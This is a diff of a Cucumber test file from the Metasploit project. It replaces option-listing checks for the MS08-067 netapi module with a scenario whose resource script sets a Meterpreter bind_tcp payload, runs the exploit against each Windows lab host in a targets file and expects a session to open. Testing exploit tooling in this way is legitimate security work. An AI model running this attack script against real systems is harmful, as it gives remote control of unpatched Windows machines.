|
1 | | -@wip |
| 1 | +@targets |
2 | 2 | Feature: MS08-067 netapi |
3 | 3 |
|
4 | 4 | Background: |
5 | 5 | Given a directory named "home" |
6 | 6 | And I cd to "home" |
7 | 7 | And a mocked home directory |
8 | | - Given I run `msfconsole` interactively |
9 | | - And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp" |
10 | 8 |
|
11 | | - Scenario: The MS08-067 Module should have the following options |
12 | | - When I type "use exploit/windows/smb/ms08_067_netapi" |
13 | | - And I type "show options" |
14 | | - And I type "exit" |
15 | | - Then the output should contain: |
| 9 | + Scenario: The MS08-067 should get a session with bind_tcp |
| 10 | + Given I ready the windows targets |
| 11 | + And a file named "ms08-067.rc" with: |
16 | 12 | """ |
17 | | - Module options (exploit/windows/smb/ms08_067_netapi): |
18 | | -
|
19 | | - Name Current Setting Required Description |
20 | | - ---- --------------- -------- ----------- |
21 | | - RHOST yes The target address |
22 | | - RPORT 445 yes Set the SMB service port |
23 | | - SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) |
24 | | -
|
25 | | -
|
26 | | - Exploit target: |
27 | | -
|
28 | | - Id Name |
29 | | - -- ---- |
30 | | - 0 Automatic Targeting |
31 | | -
|
| 13 | + <ruby> |
| 14 | + hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml') |
| 15 | + self.run_single('use exploit/windows/smb/ms08_067_netapi') |
| 16 | + self.run_single('set payload windows/meterpreter/bind_tcp') |
| 17 | + hosts['windows'].each do |host| |
| 18 | + self.run_single("set RHOST #{host['ip']}") |
| 19 | + self.run_single('run') |
| 20 | + sleep 1 |
| 21 | + end |
| 22 | + |
| 23 | + </ruby> |
32 | 24 | """ |
33 | | - |
34 | | - Scenario: The MS08-067 Module should have the following advanced options |
35 | | - When I type "use exploit/windows/smb/ms08_067_netapi" |
36 | | - And I type "show advanced" |
37 | | - And I type "exit" |
38 | | - Then the output should contain: |
39 | | - """ |
40 | | - Module advanced options: |
41 | | -
|
42 | | - Name : CHOST |
43 | | - Current Setting: |
44 | | - Description : The local client address |
45 | | -
|
46 | | - Name : CPORT |
47 | | - Current Setting: |
48 | | - Description : The local client port |
49 | | -
|
50 | | - Name : ConnectTimeout |
51 | | - Current Setting: 10 |
52 | | - Description : Maximum number of seconds to establish a TCP connection |
53 | | -
|
54 | | - Name : ContextInformationFile |
55 | | - Current Setting: |
56 | | - Description : The information file that contains context information |
57 | | -
|
58 | | - Name : DCERPC::ReadTimeout |
59 | | - Current Setting: 10 |
60 | | - Description : The number of seconds to wait for DCERPC responses |
61 | | -
|
62 | | - Name : DisablePayloadHandler |
63 | | - Current Setting: false |
64 | | - Description : Disable the handler code for the selected payload |
65 | | -
|
66 | | - Name : EnableContextEncoding |
67 | | - Current Setting: false |
68 | | - Description : Use transient context when encoding payloads |
69 | | -
|
70 | | - Name : NTLM::SendLM |
71 | | - Current Setting: true |
72 | | - Description : Always send the LANMAN response (except when NTLMv2_session is |
73 | | - specified) |
74 | | -
|
75 | | - Name : NTLM::SendNTLM |
76 | | - Current Setting: true |
77 | | - Description : Activate the 'Negotiate NTLM key' flag, indicating the use of |
78 | | - NTLM responses |
79 | | -
|
80 | | - Name : NTLM::SendSPN |
81 | | - Current Setting: true |
82 | | - Description : Send an avp of type SPN in the ntlmv2 client Blob, this allow |
83 | | - authentification on windows Seven/2008r2 when SPN is required |
84 | | -
|
85 | | - Name : NTLM::UseLMKey |
86 | | - Current Setting: false |
87 | | - Description : Activate the 'Negotiate Lan Manager Key' flag, using the LM key |
88 | | - when the LM response is sent |
89 | | -
|
90 | | - Name : NTLM::UseNTLM2_session |
91 | | - Current Setting: true |
92 | | - Description : Activate the 'Negotiate NTLM2 key' flag, forcing the use of a |
93 | | - NTLMv2_session |
94 | | -
|
95 | | - Name : NTLM::UseNTLMv2 |
96 | | - Current Setting: true |
97 | | - Description : Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key |
98 | | - is true |
99 | | -
|
100 | | - Name : Proxies |
101 | | - Current Setting: |
102 | | - Description : A proxy chain of format type:host:port[,type:host:port][...] |
103 | | -
|
104 | | - Name : SMB::ChunkSize |
105 | | - Current Setting: 500 |
106 | | - Description : The chunk size for SMB segments, bigger values will increase |
107 | | - speed but break NT 4.0 and SMB signing |
108 | | -
|
109 | | - Name : SMB::Native_LM |
110 | | - Current Setting: Windows 2000 5.0 |
111 | | - Description : The Native LM to send during authentication |
112 | | -
|
113 | | - Name : SMB::Native_OS |
114 | | - Current Setting: Windows 2000 2195 |
115 | | - Description : The Native OS to send during authentication |
116 | | -
|
117 | | - Name : SMB::VerifySignature |
118 | | - Current Setting: false |
119 | | - Description : Enforces client-side verification of server response signatures |
120 | | -
|
121 | | - Name : SMBDirect |
122 | | - Current Setting: true |
123 | | - Description : The target port is a raw SMB service (not NetBIOS) |
124 | | -
|
125 | | - Name : SMBDomain |
126 | | - Current Setting: . |
127 | | - Description : The Windows domain to use for authentication |
128 | | -
|
129 | | - Name : SMBName |
130 | | - Current Setting: *SMBSERVER |
131 | | - Description : The NetBIOS hostname (required for port 139 connections) |
132 | | -
|
133 | | - Name : SMBPass |
134 | | - Current Setting: |
135 | | - Description : The password for the specified username |
136 | | -
|
137 | | - Name : SMBUser |
138 | | - Current Setting: |
139 | | - Description : The username to authenticate as |
140 | | -
|
141 | | - Name : SSL |
142 | | - Current Setting: false |
143 | | - Description : Negotiate SSL for outgoing connections |
144 | | -
|
145 | | - Name : SSLCipher |
146 | | - Current Setting: |
147 | | - Description : String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH" |
148 | | -
|
149 | | - Name : SSLVerifyMode |
150 | | - Current Setting: PEER |
151 | | - Description : SSL verification method (Accepted: CLIENT_ONCE, |
152 | | - FAIL_IF_NO_PEER_CERT, NONE, PEER) |
153 | | -
|
154 | | - Name : SSLVersion |
155 | | - Current Setting: SSL3 |
156 | | - Description : Specify the version of SSL that should be used (Accepted: SSL2, |
157 | | - SSL3, TLS1) |
158 | | -
|
159 | | - Name : VERBOSE |
160 | | - Current Setting: false |
161 | | - Description : Enable detailed status messages |
162 | | -
|
163 | | - Name : WORKSPACE |
164 | | - Current Setting: |
165 | | - Description : Specify the workspace for this module |
166 | | -
|
167 | | - Name : WfsDelay |
168 | | - Current Setting: 0 |
169 | | - Description : Additional delay when waiting for a session |
170 | | - """ |
171 | | - |
172 | | - @targets |
173 | | - Scenario: Show RHOST/etc variable expansion from a config file |
174 | | - When I type "use exploit/windows/smb/ms08_067_netapi" |
175 | | - When RHOST is WINDOWS |
176 | | - And I type "set PAYLOAD windows/meterpreter/bind_tcp" |
177 | | - And I type "show options" |
178 | | - And I type "run" |
179 | | - And I type "exit" |
180 | | - And I type "exit" |
181 | | - Then the output should match /spider-wxp/ |
| 25 | + When I run `msfconsole --environment test -q -r ms08-067.rc -x exit` |
| 26 | + Then the output should contain "[*] Exploit completed, 1 session was created." |
0 commit comments